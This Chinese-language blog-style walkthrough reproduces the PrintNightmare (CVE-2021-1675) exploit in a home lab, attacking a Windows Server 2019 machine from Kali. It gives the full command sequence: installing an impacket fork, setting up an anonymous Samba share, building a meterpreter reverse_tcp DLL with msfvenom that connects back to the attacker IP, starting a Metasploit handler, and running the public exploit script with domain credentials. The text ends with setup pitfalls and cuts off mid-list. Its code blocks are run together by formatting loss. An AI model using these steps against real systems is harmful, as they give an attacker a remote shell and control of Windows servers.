环境
受害机:window2019(192.168.153.133)
攻击机:kali(192.168.153.134)
利用前提
或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限
一定需要:一个普通的域用户
一定需要:开启Spooler服务
环境搭建
安装impacket
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">git clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install
下配置smb服务
vim /etc/samba/smb.conf
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">[global]map to guest = Bad Userserver role = standalone serverusershare allow guests = yesidmap config * : backend = tdbsmb ports = 445[smb]comment = Sambapath = /tmp/guest ok = yesread only = nobrowsable = yes
sudo service smbd start
生成dll和启动msf
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=4444 -f dll -o /tmp/rever.dllmsfconsoleuse exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcprun
下载exp
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">cd ~/git clone https://github.com/cube0x0/CVE-2021-1675.gitcd CVE-2021-1675
利用漏洞
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">sudo python3 CVE-2021-1675.py djhons.com/test:Admin@123@192.168.153.133 '\192.168.153.134smb ever.dll'
遇到的坑
第一个坑:
按照exp里面的smb配置文件配置smb后无法匿名登录,需要提供账号和密码,后删除最后一行后可正常匿名访问。在本次实验时通过资源管理器直接访问smb服务器提示组策略出问题但是这个问题可以忽略(我也不知道为什么可以忽略),还有一个奇怪的是在公司同样的配置物理机可以直接访问smb,在家的电脑上却也需要密码而只有win7能正常访问。反正按照我上面讲的就能利用成功。
第二个坑:
949
收藏
